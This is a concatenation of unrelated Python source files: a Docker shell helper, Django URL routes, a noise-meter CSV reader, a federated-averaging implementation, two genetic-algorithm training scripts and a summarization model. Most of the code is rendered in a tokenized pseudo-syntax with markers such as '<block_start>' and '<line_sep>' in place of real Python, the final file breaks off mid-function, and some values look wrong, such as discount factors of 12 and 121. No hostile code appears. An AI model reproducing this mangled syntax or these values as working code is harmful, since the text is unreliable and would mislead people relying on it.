<import_from_stmt>..compiler.spec_assembler get_specs<import_from_stmt>. utils<import_from_stmt>..systems.docker get_dusty_container_name<def_stmt>execute_shell app_or_service_name<block_start>specs=get_specs()<if_stmt>app_or_service_name<not><in>[spec.name<for>spec specs.get_apps_and_services()]<block_start><raise>KeyError('No app or service found named {}'.format(app_or_service_name))<block_end>exec_options=utils.exec_docker_options()<line_sep>utils.exec_docker('exec' exec_options get_dusty_container_name(app_or_service_name) '/bin/bash')<block_end>
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com) c=(a b)<line_sep>d={e:1 f:2}<line_sep>fun(a b *c **d)<line_sep># EXPECTED: [<ellipsis> BUILD_TUPLE(2) <ellipsis> BUILD_TUPLE_UNPACK_WITH_CALL(2) <ellipsis> CALL_FUNCTION_EX(1) <ellipsis> ]<line_sep>
<import_stmt>django.contrib.sitemaps.views<import_stmt>django.views.i18n<import_stmt>django.views.static<import_from_stmt>django.conf settings<import_from_stmt>django.contrib admin<import_from_stmt>django.contrib.sitemaps.views sitemap<as>sitemap_view<import_from_stmt>django.urls include<import_from_stmt>django.urls re_path<as>url<import_from_stmt>django.views.decorators.cache cache_page<line_sep>urlpatterns=[url(r"^media/(?P<path>.*)$" django.views.static.serve # NOQA {"document_root":settings.MEDIA_ROOT "show_indexes":<true>} ) url(r"^admin/" admin.site.urls) # NOQA url(r"^/" include("robots.urls")) # NOQA url(r"^sitemap.xml$" sitemap_view {"sitemaps":[]}) url(r"^other/sitemap.xml$" cache_page(60)(sitemap_view) {"sitemaps":[]} name="cached-sitemap" ) ]<line_sep>
""" Cirrus ====== Handle Cirrus data. """<import_stmt>csv<import_stmt>io<import_stmt>re<import_stmt>pandas<as>pd<def_stmt>read_csv_cirrus filename# pylint: disable=too-many-locals <block_start>"""Read a Cirrus CSV file. Currently exists support for some types of CSV files extracted with NoiseTools. There is no support for CSVs related with occupational noise. If there are NC and NR values in the csv file, they will be stored in the returned object with attributes ``nc`` and ``nr``. If the CSV file contains time history, you can access to date and time with the ``time`` attribute. Also, it is possible to know the integration time with the ``integration_time`` attribute. :param filename: CSV file name. :returns: Pandas dataframe with all data extracted from the CSV file. :rtype: Pandas dataframe. """<with_stmt>open(filename "r")<as>csvfile<block_start>csvreader=csvfile.read()<line_sep>csvreader=re.sub(r" dB" "" csvreader)# Clean " dB" from data dialect=csv.Sniffer().sniff(csvreader delimiters=",;")<line_sep>separator=dialect.delimiter<line_sep># Guess decimal separator decimal_sep=re.search(r"\"\d{2,3}"<concat>r"(\.|,)"# Decimal separator <concat>r"\d{1,2}\"" csvreader ).group(1)<block_end>n_cols=re.search("(.+)\n" csvreader).group(1).count(separator)+1<if_stmt>n_cols<l>5<block_start>unsorted_data=[]<line_sep>pdindex=["Z"]<for_stmt>i,c enumerate(csvreader.splitlines())<block_start><if_stmt>c[:4]<eq>'"NR"'<block_start>nr=int(re.search(r"\d{2}" c).group(0))<line_sep><continue><block_end><elif_stmt>c[:4]<eq>'"NC"'<block_start>nc=int(re.search(r"\d{2}" c).group(0))<line_sep><continue><block_end><if_stmt>i<ne>0<block_start>unsorted_data.append(c.split(separator))<block_end><else_stmt><block_start><if_stmt>n_cols<eq>3<block_start>pdindex.append(c[-2:-1])<block_end><elif_stmt>n_cols<eq>4<block_start>pdindex.append("A")<line_sep>pdindex.append("C")<block_end><block_end><block_end># Create a sorted temporary csv-like file 
csv_data=list(zip(*unsorted_data))<line_sep>temp_csv=""<for_stmt>row csv_data<block_start>temp_csv<augadd>separator.join(row)+"\n"<block_end># Then, read it with pandas data=pd.read_csv(io.StringIO(temp_csv) sep=separator decimal=decimal_sep )<line_sep># Assign NC and NR data if they are present <try_stmt><block_start>data.nc=nc<line_sep>data.nr=nr<block_end># TODO specify exception type: <except_stmt># pylint: disable=bare-except <block_start><pass><block_end># If the csv file contains global data from the "Details" tab in # NoiseTools, skip row names <if_stmt>n_cols<ne>2<block_start>data.index=pdindex<block_end><block_end><else_stmt><block_start>data=pd.read_csv(filename parse_dates=[[0 1]] sep=separator decimal=decimal_sep )<line_sep># Fix time name column en_columns=data.columns.values<line_sep>en_columns[0]="time"<line_sep>data.columns=en_columns<line_sep># Guess integration time with statistical mode because the csv could # have been cleaned from unwanted noise data["time"]=pd.to_datetime(data.time)<line_sep>delta=data.time.diff().fillna(0.0)<line_sep># Mode and change from ns to s int_time=int(delta.mode().astype(int)<times>1e-9)<if_stmt>round(int_time 2)<eq>0.06# Fix for 1/16 s <block_start>int_time=0.0625<block_end>data.integration_time=int_time<block_end><return>data<block_end>
# Copyright 2020, The TensorFlow Federated Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """An implementation of the FedAvg algorithm with stateful clients. The TF functions for sever and client udpates. """<import_stmt>collections<import_from_stmt>typing Union<import_stmt>attr<import_stmt>tensorflow<as>tf<import_stmt>tensorflow_federated<as>tff<line_sep>ModelWeights=collections.namedtuple('ModelWeights' 'trainable non_trainable')<line_sep>ModelOutputs=collections.namedtuple('ModelOutputs' 'loss')<def_stmt>get_model_weights model:Union[tff.learning.Model 'KerasModelWrapper']<arrow>Union[tff.learning.ModelWeights ModelWeights]<block_start>"""Gets the appropriate ModelWeights object based on the model type."""<if_stmt>isinstance(model tff.learning.Model)<block_start><return>tff.learning.ModelWeights.from_model(model)<block_end><else_stmt># Using simple_fedavg custom Keras wrapper. <block_start><return>model.weights<block_end><block_end><class_stmt>KerasModelWrapper(object)<block_start>"""A standalone keras wrapper to be used in TFF."""<def_stmt>__init__ self keras_model input_spec loss<block_start>"""A wrapper class that provides necessary API handles for TFF. Args: keras_model: A `tf.keras.Model` to be trained. input_spec: Metadata of dataset that desribes the input tensors, which will be converted to `tff.Type` specifying the expected type of input and output of the model. loss: A `tf.keras.losses.Loss` instance to be used for training. 
"""<line_sep>self.keras_model=keras_model<line_sep>self.input_spec=input_spec<line_sep>self.loss=loss<block_end><def_stmt>forward_pass self batch_input training=<true><block_start>"""Forward pass of the model to get loss for a batch of data. Args: batch_input: A `collections.abc.Mapping` with two keys, `x` for inputs and `y` for labels. training: Boolean scalar indicating training or inference mode. Returns: A scalar tf.float32 `tf.Tensor` loss for current batch input. """<line_sep>preds=self.keras_model(batch_input['x'] training=training)<line_sep>loss=self.loss(batch_input['y'] preds)<line_sep><return>ModelOutputs(loss=loss)<block_end>@property<def_stmt>weights self<block_start><return>ModelWeights(trainable=self.keras_model.trainable_variables non_trainable=self.keras_model.non_trainable_variables)<block_end><def_stmt>from_weights self model_weights<block_start>tf.nest.map_structure(<lambda>v t:v.assign(t) self.keras_model.trainable_variables list(model_weights.trainable))<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) self.keras_model.non_trainable_variables list(model_weights.non_trainable))<block_end><block_end><def_stmt>keras_evaluate model test_data metric<block_start>metric.reset_states()<for_stmt>batch test_data<block_start>preds=model(batch['x'] training=<false>)<line_sep>metric.update_state(y_true=batch['y'] y_pred=preds)<block_end><return>metric.result()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>ClientState(object)<block_start>"""Structure for state on the client. Fields: - `client_index`: The client index integer to map the client state back to the database hosting client states in the driver file. - `iters_count`: The number of total iterations a client has computed in the total rounds so far. 
"""<line_sep>client_index=attr.ib()<line_sep>iters_count=attr.ib()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>ClientOutput(object)<block_start>"""Structure for outputs returned from clients during federated optimization. Fields: - `weights_delta`: A dictionary of updates to the model's trainable variables. - `client_weight`: Weight to be used in a weighted mean when aggregating `weights_delta`. - `model_output`: A structure matching `tff.learning.Model.report_local_outputs`, reflecting the results of training on the input dataset. - `client_state`: The updated `ClientState`. """<line_sep>weights_delta=attr.ib()<line_sep>client_weight=attr.ib()<line_sep>model_output=attr.ib()<line_sep>client_state=attr.ib()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>ServerState(object)<block_start>"""Structure for state on the server. Fields: - `model_weights`: A dictionary of model's trainable variables. - `optimizer_state`: Variables of optimizer. - 'round_num': Current round index - `total_iters_count`: The total number of iterations run on seen clients """<line_sep>model_weights=attr.ib()<line_sep>optimizer_state=attr.ib()<line_sep>round_num=attr.ib()<line_sep>total_iters_count=attr.ib()<block_end>@attr.s(eq=<false> frozen=<true> slots=<true>)<class_stmt>BroadcastMessage(object)<block_start>"""Structure for tensors broadcasted by server during federated optimization. Fields: - `model_weights`: A dictionary of model's trainable tensors. - `round_num`: Round index to broadcast. We use `round_num` as an example to show how to broadcast auxiliary information that can be helpful on clients. It is not explicitly used, but can be applied to enable learning rate scheduling. """<line_sep>model_weights=attr.ib()<line_sep>round_num=attr.ib()<block_end>@tf.function<def_stmt>server_update model server_optimizer server_state weights_delta total_iters_count<block_start>"""Updates `server_state` based on `weights_delta`. 
Args: model: A `KerasModelWrapper` or `tff.learning.Model`. server_optimizer: A `tf.keras.optimizers.Optimizer`. If the optimizer creates variables, they must have already been created. server_state: A `ServerState`, the state to be updated. weights_delta: A nested structure of tensors holding the updates to the trainable variables of the model. total_iters_count: A scalar to update `ServerState.total_iters_count`. Returns: An updated `ServerState`. """<line_sep># Initialize the model with the current state. model_weights=get_model_weights(model)<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) model_weights server_state.model_weights)<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) server_optimizer.variables() server_state.optimizer_state)<line_sep># Apply the update to the model. neg_weights_delta=[-1.0<times>x<for>x weights_delta]<line_sep>server_optimizer.apply_gradients(zip(neg_weights_delta model_weights.trainable) name='server_update')<line_sep># Create a new state based on the updated model. <return>tff.structure.update_struct(server_state model_weights=model_weights optimizer_state=server_optimizer.variables() round_num=server_state.round_num+1 total_iters_count=total_iters_count)<block_end>@tf.function<def_stmt>build_server_broadcast_message server_state<block_start>"""Build `BroadcastMessage` for broadcasting. This method can be used to post-process `ServerState` before broadcasting. For example, perform model compression on `ServerState` to obtain a compressed state that is sent in a `BroadcastMessage`. Args: server_state: A `ServerState`. Returns: A `BroadcastMessage`. """<line_sep><return>BroadcastMessage(model_weights=server_state.model_weights round_num=server_state.round_num)<block_end>@tf.function<def_stmt>client_update model dataset client_state server_message client_optimizer<block_start>"""Performans client local training of `model` on `dataset`. Args: model: A `tff.learning.Model`. dataset: A 'tf.data.Dataset'. 
client_state: A 'ClientState'. server_message: A `BroadcastMessage` from server. client_optimizer: A `tf.keras.optimizers.Optimizer`. Returns: A 'ClientOutput`. """<line_sep>model_weights=get_model_weights(model)<line_sep>initial_weights=server_message.model_weights<line_sep>tf.nest.map_structure(<lambda>v t:v.assign(t) model_weights initial_weights)<line_sep>num_examples=tf.constant(0 dtype=tf.int32)<line_sep>loss_sum=tf.constant(0 dtype=tf.float32)<line_sep>iters_count=tf.convert_to_tensor(client_state.iters_count)<for_stmt>batch dataset<block_start><with_stmt>tf.GradientTape()<as>tape<block_start>outputs=model.forward_pass(batch)<block_end>grads=tape.gradient(outputs.loss model_weights.trainable)<line_sep>client_optimizer.apply_gradients(zip(grads model_weights.trainable))<line_sep>batch_size=(tf.shape(batch['x'])[0])<line_sep>num_examples<augadd>batch_size<line_sep>loss_sum<augadd>outputs.loss<times>tf.cast(batch_size tf.float32)<line_sep>iters_count<augadd>1<block_end>weights_delta=tf.nest.map_structure(<lambda>a b:a-b model_weights.trainable initial_weights.trainable)<line_sep>client_weight=tf.cast(num_examples tf.float32)<line_sep><return>ClientOutput(weights_delta client_weight loss_sum/client_weight ClientState(client_index=client_state.client_index iters_count=iters_count))<block_end>
<import_stmt>argparse<import_from_stmt>genrl A2C PPO1<import_from_stmt>genrl.deep.common OnPolicyTrainer<import_from_stmt>genrl.deep.common.actor_critic MlpActorCritic<import_from_stmt>genrl.deep.common.utils get_env_properties<import_from_stmt>genrl.environments VectorEnv<import_from_stmt>genrl.evolutionary GeneticHyperparamTuner<line_sep># """ # Okay so parameters to tune:- # - layers # - lr_policy # - lr_value # - clip param # - entropy coeff # - value coeff # - gamma # """ <def_stmt>get_logger log<block_start><if_stmt>","<not><in>log<block_start><return>[log]<block_end><else_stmt><block_start>log=log.split(",")<if_stmt>""<in>log<or>" "<in>log<block_start>log=[i<for>i log<if>i<ne>""]<line_sep>log=[i<for>i log<if>i<ne>" "]<block_end><return>log<block_end><block_end># Code inspired from https://github.com/harvitronix/neural-network-genetic-algorithm <class_stmt>GATuner(GeneticHyperparamTuner)<block_start><def_stmt>fitness self agent<block_start>""" Return the mean rewards, which is our fitness function """<line_sep><return>agent.get_logging_params()["mean_reward"]<block_end><block_end><def_stmt>train_population agents envirnment args<block_start>""" Train all the agents in the population Args: agents (List) : List of agent envirnment: Gym envirnment """<line_sep>logger=get_logger(args.log)<for_stmt>agent agents<block_start>trainer=OnPolicyTrainer(agent envirnment logger epochs=args.epochs render=args.render log_interval=args.log_interval )<line_sep>trainer.train()<del_stmt>trainer<line_sep>print("-"<times>80)<block_end><block_end><def_stmt>generate generations no_of_parents agent_parameter_choices envirnment generic_agent args<block_start>""" Genetic Algorithm for RL Args: generations (int): No of generations no_of_parents(int): No of agents in a generation agent_parameter_choices(Dict): Parameter choices for the agent envirnment: Gym Envirnment generic_agent : RL Agent to be tuned 
"""<line_sep>optimizer=GATuner(agent_parameter_choices)<line_sep>agents=optimizer.initialize_population(no_of_parents generic_agent)<line_sep># evolve the generation <for_stmt>i range(generations)<block_start>print(f"Doing generation {i}/{generations}")<line_sep># Train the agents train_population(agents envirnment args)<line_sep># get average fitness of the generation avg_reward=optimizer.grade(agents)<line_sep>print(f"Generation avg reward:{avg_reward}")<line_sep>print("-"<times>50)<line_sep># Evolve the generation <if_stmt>i<ne>generations-1<block_start>agents=optimizer.evolve(agents)<block_end><block_end># sort our final population agents=sorted(agents key=<lambda>x:optimizer.fitness(x) reverse=<true>)<line_sep># print rewards of top 5 <for_stmt>i range(5)<block_start>print(f"Top {i+1} agent reward: {optimizer.fitness(agents[i])}")<block_end><block_end><def_stmt>main args<block_start>env=VectorEnv(args.env n_envs=args.n_envs parallel=<not>args.serial env_type=args.env_type)<line_sep>input_dim,action_dim,discrete,action_lim=get_env_properties(env "mlp")<line_sep>network=MlpActorCritic(input_dim action_dim (1 1) # layers (1 1) "V" # type of value function discrete action_lim=action_lim activation="relu" )<line_sep>generic_agent=A2C(network env rollout_size=args.rollout_size)<line_sep>agent_parameter_choices={"gamma":[12 121] # 'clip_param': [0.2, 0.3], # 'lr_policy': [0.001, 0.002], # 'lr_value': [0.001, 0.002] }<line_sep>generate(args.generations args.population agent_parameter_choices env generic_agent args )<block_end><if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser(description="Train Deep RL algorithms")<line_sep># parser.add_argument("-a", "--algo", help="Which Algo to train", default="ppo", type=str) parser.add_argument("-e" "--env" help="Which env to train on" default="CartPole-v0" type=str)<line_sep>parser.add_argument("--env-type" help="What kind of env is it" default="gym" type=str)<line_sep>parser.add_argument("-n" "--n-envs" 
help="Number of vectorized envs to train on" default=2 type=int )<line_sep>parser.add_argument("--serial" help="Vectorized envs should be serial or parallel" default=<true> type=bool )<line_sep>parser.add_argument("--epochs" help="How many epochs to train on" default=20 type=int)<line_sep>parser.add_argument("--render" help="Should the env be rendered" default=<false> action="store_true" )<line_sep>parser.add_argument("--log" help="Comma separated string of logs" default="stdout" type=str)<line_sep>parser.add_argument("--arch" help="Which architecture mlp/cnn for now" default="mlp" type=str)<line_sep>parser.add_argument("--log-interval" help="Set Log interval" default=50 type=int)<line_sep>parser.add_argument("--batch-size" help="Batch Size" default=128 type=int)<line_sep>parser.add_argument("--population" help="No. of agents in a generation" default=10 type=int)<line_sep>parser.add_argument("--generations" help="No. of generations" default=5 type=int)<line_sep>offpolicyargs=parser.add_argument_group("Off Policy Args")<line_sep>offpolicyargs.add_argument("-ws" "--warmup-steps" help="Warmup steps" default=10000 type=int)<line_sep>offpolicyargs.add_argument("--replay-size" help="Replay Buffer Size" default=1000 type=int)<line_sep>onpolicyargs=parser.add_argument_group("On Policy Args")<line_sep>onpolicyargs.add_argument("--rollout-size" help="Rollout Buffer Size" default=2048 type=int)<line_sep>args=parser.parse_args()<line_sep>main(args)<block_end>
""" file: simple_gen.py author: <NAME> date: 17 May 2020 notes: a most basic implementation of genetic cross breeding and mutation to attempt to improve a neural network. Assumes the standard Keras model from Donkeycar project. Lower score means less loss = better. """<import_stmt>argparse<import_stmt>json<import_stmt>os<import_stmt>time<import_stmt>warnings<import_stmt>numpy<as>np<import_from_stmt>PIL Image<line_sep># noisy, noisy tensorflow. we love you. os.environ["TF_CPP_MIN_LOG_LEVEL"]="3"<with_stmt>warnings.catch_warnings()<block_start>warnings.filterwarnings("ignore" category=FutureWarning)<import_stmt>tensorflow<as>tf<block_end>tf.logging.set_verbosity(tf.logging.ERROR)<class_stmt>IAgent<block_start><def_stmt>begin self<block_start><pass><block_end><def_stmt>wait self<block_start><pass><block_end><def_stmt>get_score self<block_start><pass><block_end><def_stmt>make_new self parent1 parent2<block_start><return>IAgent()<block_end><block_end><class_stmt>GeneticAlg<block_start><def_stmt>__init__ self population conf={}<block_start>self.population=population<line_sep>self.conf=conf<block_end><def_stmt>finished self<block_start><return><false><block_end><def_stmt>process self num_iter<block_start>iIter=0<while_stmt><not>self.finished()<and>iIter<l>num_iter<block_start>print("starting epoch" iIter)<line_sep>s=time.time()<line_sep>self.evaluate_agents()<line_sep>self.on_agents_finished()<line_sep>e=time.time()-s<line_sep>self.breed_agents()<line_sep>iIter<augadd>1<line_sep>d=time.time()-s<line_sep># Time per iteration getting worse?! 
print("finish epoch" iIter)<line_sep>print("Iter %d eval time: %f total time: %f"%(iIter e d))<block_end><block_end><def_stmt>on_agents_finished self<block_start><pass><block_end><def_stmt>evaluate_agents self<block_start><for_stmt>agent self.population<block_start>agent.begin()<block_end><for_stmt>agent self.population<block_start>agent.wait()<block_end>self.sort_agents()<line_sep># progress print("scores:" [a.score<for>a self.population])<block_end><def_stmt>how_many_to_keep self<block_start><return>round(len(self.population)/4)+1<block_end><def_stmt>breed_agents self<block_start>""" keep the best N of our population and replace the rest with versions cross bred from other agents. """<line_sep>keep=self.how_many_to_keep()<line_sep>num_new=len(self.population)-keep<line_sep>pop_to_keep=self.population[0:keep]<line_sep>new_population=[]<for_stmt>_ range(num_new)<block_start>p1,p2=self.select_parents()<line_sep>new_agent=p1.make_new(p1 p2)<line_sep>new_agent.mutate()<line_sep>new_population.append(new_agent)<block_end>self.population=pop_to_keep+new_population<block_end><def_stmt>sort_agents self<block_start>self.population.sort(key=<lambda>x:x.get_score() reverse=<false>)<block_end><def_stmt>select_pop_index self<block_start>r=np.random.uniform(low=0.0 high=1.0)<line_sep>N=len(self.population)<line_sep>iP=round(r<times>N)%N<line_sep><return>iP<block_end><def_stmt>select_parents self<block_start>iP1=self.select_pop_index()<line_sep>iP2=self.select_pop_index()<line_sep># hack, always select the best 2 # iP1 = 0 # iP2 = 1 # lets make sure parents are not the same <while_stmt>iP2<eq>iP1<block_start>iP2=self.select_pop_index()<block_end><return>self.population[iP1] self.population[iP2]<block_end><block_end><class_stmt>NNAgent(IAgent)<block_start><def_stmt>__init__ self model conf<block_start>self.model=model<line_sep>self.score=0.0<line_sep>self.conf=conf<block_end><def_stmt>begin self<block_start>self.score=0.0<block_end><def_stmt>wait 
self<block_start><pass><block_end><def_stmt>get_score self<block_start><return>self.score<block_end><def_stmt>mutate self<block_start><pass><block_end><def_stmt>breed self agent1 agent2<block_start><return>agent1.model<block_end><def_stmt>make_new self parent1 parent2<block_start>new_model=self.breed(parent1 parent2)<line_sep>agent=NNAgent(new_model self.conf)<line_sep>agent.mutate()<line_sep><return>agent<block_end><block_end><class_stmt>KerasNNAgent(NNAgent)<block_start><def_stmt>__init__ self model conf<block_start>super().__init__(model conf)<line_sep>self.mutation_rate=conf["mutation_rate"]<block_end><def_stmt>mutate self<block_start>layers_to_mutate=self.conf["layers_to_mutate"]<for_stmt>iLayer layers_to_mutate<block_start>layer=self.model.get_layer(index=iLayer)<line_sep>w=layer.get_weights()<line_sep>self.modify_weights(w)<line_sep>layer.set_weights(w)<block_end>self.decay_mutations()<block_end><def_stmt>rand_float self mn mx<block_start><return>float(np.random.uniform(mn mx 1)[0])<block_end><def_stmt>modify_weights self w<block_start>mx=self.conf["mutation_max"]<line_sep>mn=self.conf["mutation_min"]<line_sep>mag=self.rand_float(mn mx)<for_stmt>iArr,arr enumerate(w)<block_start>val=self.rand_float(0.0 1.0)<if_stmt>val<g>self.mutation_rate<block_start><continue><block_end>random_values=np.random.uniform(-mag mag arr.shape)<line_sep>arr=arr+random_values<line_sep>w[iArr]=arr<block_end><return>w<block_end><def_stmt>decay_mutations self<block_start>self.conf["mutation_max"]<augmul>self.conf["mutation_decay"]<block_end><def_stmt>breed self agent1 agent2<block_start>model1,model2=agent1.model agent2.model<line_sep>jsm=model1.to_json()<line_sep>new_model=tf.keras.models.model_from_json(jsm)<line_sep>new_model.set_weights(model1.get_weights())<line_sep>iLayers=self.conf["layers_to_combine"]<for_stmt>iLayer 
iLayers<block_start>layer1=model1.get_layer(index=iLayer)<line_sep>layer2=model2.get_layer(index=iLayer)<line_sep>final_layer=new_model.get_layer(index=iLayer)<line_sep>self.merge_layers(final_layer layer1 layer2)<block_end><return>new_model<block_end><def_stmt>merge_layers self dest_layer src1_layer src2_layer<block_start>w1=src1_layer.get_weights()<line_sep>w2=src2_layer.get_weights()<line_sep>res=w1.copy()<if_stmt>type(w1)<is>list<block_start>half=round(len(w1)/2)<line_sep>res[half:-1]=w2[half:-1]<block_end><else_stmt><block_start>l_indices=np.tril_indices_from(w2)<line_sep>res[l_indices]=w2[l_indices]<block_end>dest_layer.set_weights(res)<block_end><block_end><class_stmt>KerasNNImageAgent(KerasNNAgent)<block_start>""" Given an image and a target prediction, make an agent that will optimize for score of target. """<def_stmt>__init__ self model conf<block_start>super().__init__(model conf)<line_sep>self.image=conf["image"]<line_sep>self.target=conf["target"]<block_end><def_stmt>begin self<block_start>pred=self.model.predict(self.image)<line_sep>self.score=np.sum(np.absolute(pred-self.target))<block_end><def_stmt>make_new self parent1 parent2<block_start>new_model=self.breed(parent1 parent2)<line_sep>agent=KerasNNImageAgent(new_model self.conf)<line_sep>agent.mutate()<line_sep><return>agent<block_end><block_end><def_stmt>test_image_agent model_filename record_filename num_agents num_iter<block_start><with_stmt>open(os.path.expanduser(record_filename) "r")<as>fp<block_start>record=json.load(fp)<block_end>img_filename=os.path.join(os.path.dirname(record_filename) record["cam/image_array"])<line_sep>img=Image.open(os.path.expanduser(img_filename))<line_sep>img_arr=np.array(img)<line_sep># Our model was trained with this normalization scale on data. 
one_byte_scale=1.0/255.0<line_sep>img_arr=img_arr.astype(np.float32)<times>one_byte_scale<line_sep>img_arr=img_arr.reshape((1 )+img_arr.shape)<line_sep>steering=record["user/angle"]<line_sep>throttle=record["user/throttle"]<line_sep>target=np.array([np.array([[steering]]) np.array([[throttle]])])<line_sep># These are the final two dense layers we will mutate. We will use the same two layers we breeding. to_mutate=[14 16]<line_sep>conf={"layers_to_mutate":to_mutate}<line_sep>conf["layers_to_combine"]=to_mutate<line_sep>conf["mutation_rate"]=1.0<line_sep>conf["mutation_max"]=0.3<line_sep>conf["mutation_min"]=0.0<line_sep>conf["mutation_decay"]=1.0<line_sep>conf["image"]=img_arr<line_sep>conf["target"]=target<line_sep>population=[]<for_stmt>i range(num_agents)<block_start>model=tf.keras.models.load_model(os.path.expanduser(model_filename))<line_sep>agent=KerasNNImageAgent(model conf)<if_stmt>i<g>0<block_start>agent.mutate()<block_end>population.append(agent)<block_end># Some initial state print("target: steering: %f throttle: %f"%(target[0][0][0] target[1][0][0]))<line_sep>agent=population[0]<line_sep>agent.begin()<line_sep>print("initial score:" agent.score)<line_sep>pred=agent.model.predict(img_arr)<line_sep>print("initial pred" pred[0][0] pred[1][0])<line_sep># Try to improve alg=GeneticAlg(population)<line_sep>alg.process(num_iter=num_iter)<line_sep># Our best agent agent=alg.population[0]<line_sep>print("final score:" agent.score)<line_sep>pred=agent.model.predict(img_arr)<line_sep>print("final pred" pred[0][0] pred[1][0])<block_end><if_stmt>__name__<eq>"__main__"# Example: python ~\projects\gym-donkeycar\examples\genetic_alg\simple_gen.py # --model models\lane_keeper.h5 --record data\tub_6_20-05-16\record_2000.json <block_start>parser=argparse.ArgumentParser(description="simple_gen")<line_sep>parser.add_argument("--model" type=str help=".h5 model produced by donkeycar. 
expects the default linear model type.")<line_sep>parser.add_argument("--record" type=str help="donkey json record to use for training")<line_sep>parser.add_argument("--num_agents" type=int default=8 help="how many agents in our population")<line_sep>parser.add_argument("--num_iter" type=int default=8 help="how many generations before we stop")<line_sep>args=parser.parse_args()<line_sep># only needed if TF==1.13.1 # config = tf.ConfigProto() # config.gpu_options.allow_growth = True # sess = tf.Session(config=config) # K.set_session(sess) test_image_agent(model_filename=args.model record_filename=args.record num_agents=args.num_agents num_iter=args.num_iter)<block_end>
####################################
# Author: <NAME>
# Date: September 2016
# Project: Document Summarization
# H2020 Summa Project
####################################

"""
Document Summarization Modules and Models
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np
import tensorflow as tf
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import seq2seq
from tensorflow.python.ops import math_ops

# from tf.nn import variable_scope
from my_flags import FLAGS
from model_utils import *

### Various types of extractor


def sentence_extractor_nonseqrnn_noatt(sents_ext, encoder_state):
    """Implements Sentence Extractor: no attention and non-sequential RNN.

    Args:
      sents_ext: List of sentence embeddings to label for extraction.
      encoder_state: Final state of the document encoder; initialises the
        extractor RNN.

    Returns:
      rnn_extractor_output: [batch_size, max_doc_length, FLAGS.size]
      logits (no softmax): [batch_size, max_doc_length, FLAGS.target_label_size]
    """
    # Define projection variables, shared across all time steps.
    weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
    bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())

    # Get RNN output, seeded with the document encoder's final state.
    rnn_extractor_output, _ = simple_rnn(sents_ext, initial_state=encoder_state)

    with variable_scope.variable_scope("Reshape-Out"):
        rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)

        # Get final logits without softmax: one projection per time step.
        extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
        logits = tf.matmul(extractor_output_forlogits, weight) + bias
        # logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
        logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
    return rnn_extractor_output, logits


def sentence_extractor_nonseqrnn_titimgatt(sents_ext, encoder_state, titleimages):
    """Implements Sentence Extractor: non-sequential RNN with attention
    over title-images.

    Args:
      sents_ext: List of sentence embeddings to label for extraction.
      encoder_state: Final state of the document encoder.
      titleimages: Embeddings of title and images in the document (attention keys).

    Returns:
      rnn_extractor_output: [batch_size, max_doc_length, FLAGS.size]
      logits (no softmax): [batch_size, max_doc_length, FLAGS.target_label_size]
    """
    # Define projection variables, shared across all time steps.
    weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
    bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())

    # Get RNN output, attending over title/image embeddings.
    rnn_extractor_output, _ = simple_attentional_rnn(sents_ext, titleimages, initial_state=encoder_state)

    with variable_scope.variable_scope("Reshape-Out"):
        rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)

        # Get final logits without softmax.
        extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
        logits = tf.matmul(extractor_output_forlogits, weight) + bias
        # logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
        logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
    return rnn_extractor_output, logits


def sentence_extractor_seqrnn_docatt(sents_ext, encoder_outputs, encoder_state, sents_labels):
    """Implements Sentence Extractor: sequential RNN with attention over
    sentences during encoding (JP-style decoder).

    Args:
      sents_ext: List of sentence embeddings to label for extraction.
      encoder_outputs: Per-step outputs of the document encoder (attention keys).
      encoder_state: Final state of the document encoder.
      sents_labels: Gold sentence labels, used only for cross-entropy training.

    Returns:
      extractor_outputs: [batch_size, max_doc_length, 2 * FLAGS.size]
      logits (no softmax): [batch_size, max_doc_length, FLAGS.target_label_size]
    """
    # Define MLP variables for the decoder.
    weights = {
        'h1': variable_on_cpu('weight_1', [2 * FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
        'h2': variable_on_cpu('weight_2', [FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
        'out': variable_on_cpu('weight_out', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer()),
    }
    biases = {
        'b1': variable_on_cpu('bias_1', [FLAGS.size], tf.random_normal_initializer()),
        'b2': variable_on_cpu('bias_2', [FLAGS.size], tf.random_normal_initializer()),
        'out': variable_on_cpu('bias_out', [FLAGS.target_label_size], tf.random_normal_initializer()),
    }

    # Shift sents_ext for the RNN: the decoder sees the previous sentence.
    with variable_scope.variable_scope("Shift-SentExt"):
        # Create embedding for a special start symbol (all zeros) and put it
        # in front, shifting the sequence by one.
        special_tensor = tf.zeros_like(sents_ext[0])  # tf.ones_like(sents_ext[0])
